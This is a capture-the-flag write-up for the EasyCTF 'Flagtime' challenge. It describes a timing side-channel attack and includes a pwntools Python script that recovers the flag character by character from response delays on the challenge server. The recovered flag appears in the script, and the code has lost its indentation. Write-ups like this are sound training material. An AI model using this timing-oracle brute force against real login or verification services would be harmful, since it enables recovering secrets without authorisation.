Tags: timing easyctf attack 

Rating:

Original at [https://ctfshellclub.github.io/2018/02/21/easyctf-flagtime/](https://ctfshellclub.github.io/2018/02/21/easyctf-flagtime/)

# EASYCTF - Flagtime

> This problem is so easy, it can be solved in a matter of seconds. Connect to c1.easyctf.com:12482.

This was a simple timing attack on the service `c1.easyctf.com:12482`. However extracting the 26 characters took a really long time... The first delay was 1 second and then was incremented by 1 for every correct characters, when you're trying to get the last characters it took around 25 seconds a try :(

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pwn import *
import time

flag = "easyctf{ez_t1m1ng_4ttack!}"
max_time = 27

while True:
for c in "!?}_15scktemng4afbsydh5ij37lopqruvwx02689z-@{":
p = remote("c1.easyctf.com", 12482)
p.recv()

before = time.time()
p.sendline(flag+c)
p.recv()
p.close()

after = time.time()
if after-before > max_time:
max_time = max_time+1
print max_time
flag = flag+c
break

print flag
```

Original writeup (https://ctfshellclub.github.io/2018/02/21/easyctf-flagtime/).